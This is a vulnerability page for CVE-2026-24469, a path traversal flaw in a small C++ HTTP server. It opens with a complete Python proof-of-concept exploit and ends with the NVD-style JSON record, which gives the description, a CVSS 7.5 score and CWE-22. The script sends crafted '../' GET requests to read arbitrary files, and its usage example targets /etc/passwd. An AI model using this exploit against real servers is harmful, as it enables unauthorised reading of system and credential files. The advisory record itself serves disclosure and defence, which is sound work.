CVE-2026-24469

import socket import sys def exploit_cve_2026_24469(target_host, target_port, file_to_read): """ PoC for CVE-2026-24469: Path Traversal in C++ HTTP Server This exploit demonstrates reading arbitrary files via path traversal """ # Construct path traversal payload traversal = "../../.." payload = f"GET /{traversal}{file_to_read} HTTP/1.1\r\n" payload += f"Host: {target_host}:{target_port}\r\n" payload += "User-Agent: Mozilla/5.0\r\n" payload += "Accept: */*\r\n" payload += "Connection: close\r\n\r\n" print(f"[*] Sending malicious request to {target_host}:{target_port}") print(f"[*] Payload: {payload.strip()}") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) sock.send(payload.encode()) response = b"" while True: data = sock.recv(4096) if not data: break response += data sock.close() # Parse HTTP response response_text = response.decode('utf-8', errors='ignore') print("\n[+] Response received:") print(response_text) return response_text except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <host> <port> <file_path>") print(f"Example: {sys.argv[0]} 192.168.1.100 8080 /etc/passwd") sys.exit(1) target_host = sys.argv[1] target_port = int(sys.argv[2]) file_path = sys.argv[3] exploit_cve_2026_24469(target_host, target_port, file_path)

{"cve": {"id": "CVE-2026-24469", "sourceIdentifier": "[email protected]", "published": "2026-01-24T03:16:01.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "C++ HTTP Server is an HTTP/1.1 server built to handle client connections and serve HTTP requests. Versions 1.0 and below are vulnerable to Path Traversal via the RequestHandler::handleRequest method. This flaw allows an unauthenticated, remote attacker to read arbitrary files from the server's filesystem by crafting a malicious HTTP GET request containing ../ sequences. The application fails to sanitize the filename variable derived from the user-controlled URL path, directly concatenating it to the files_directory base path and enabling traversal outside the intended root. No patch was available at the time of publication."}, {"lang": "es", "value": "C++ HTTP Server es un servidor HTTP/1.1 diseñado para manejar conexiones de clientes y servir solicitudes HTTP. Las versiones 1.0 e inferiores son vulnerables a salto de ruta a través del método RequestHandler::handleRequest. Esta falla permite a un atacante remoto no autenticado leer archivos arbitrarios del sistema de archivos del servidor al crear una solicitud HTTP GET maliciosa que contiene secuencias ../. La aplicación no logra sanear la variable filename derivada de la ruta URL controlada por el usuario, concatenándola directamente a la ruta base files_directory y permitiendo el salto de ruta fuera de la raíz prevista. Ningún parche estaba disponible en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/frustratedProton/http-server/security/advisories/GHSA-qp54-6gfq-3gff", "source": "[email protected]"}]}}